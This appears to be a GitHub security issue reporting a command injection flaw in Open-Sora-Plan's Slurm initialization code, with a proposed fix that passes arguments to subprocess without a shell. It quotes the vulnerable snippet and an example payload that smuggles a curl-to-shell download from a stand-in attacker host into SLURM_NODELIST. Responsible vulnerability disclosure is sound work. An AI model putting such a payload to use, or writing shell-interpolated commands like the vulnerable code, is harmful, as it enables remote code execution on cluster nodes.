Command Injection via SLURM_NODELIST in Distributed InitializationΒ #597
Description
Hi Open-Sora-Plan team,
During a security audit of the infrastructure utilities, I identified a command injection vulnerability in the Slurm-based distributed initialization logic.
π Location
opensora/utils/utils.py:322
π¨ Vulnerable Code
node_list = os.environ["SLURM_NODELIST"]
addr = subprocess.getoutput(f"scontrol show hostname {node_list} | head -n1")β οΈ Issue
The code uses subprocess.getoutput, which implicitly executes commands with shell=True, and directly interpolates the SLURM_NODELIST environment variable into the command string.
This introduces a command injection vulnerability, as no sanitization or validation is applied to node_list.
π₯ Impact
In Slurm environments, environment variables may be influenced during job submission. If an attacker controls SLURM_NODELIST, they can inject arbitrary shell commands.
Example payload:
SLURM_NODELIST="node1; curl http://attacker/payload.sh | sh"This would result in arbitrary command execution on the compute node, potentially leading to:
- Remote Code Execution (RCE)
- Cluster compromise
- Lateral movement across nodes
β Recommended Fix
Avoid shell execution entirely and pass arguments safely:
import subprocess
result = subprocess.run(
["scontrol", "show", "hostname", node_list],
capture_output=True,
text=True,
check=True
)
addr = result.stdout.splitlines()[0]π Reason
- Eliminates
shell=True - Prevents command parsing by the shell
- Ensures safe handling of untrusted input
I have verified this issue directly against the source code.
I can provide a patch or PR if needed.
Best regards,
DataWizual Lab Team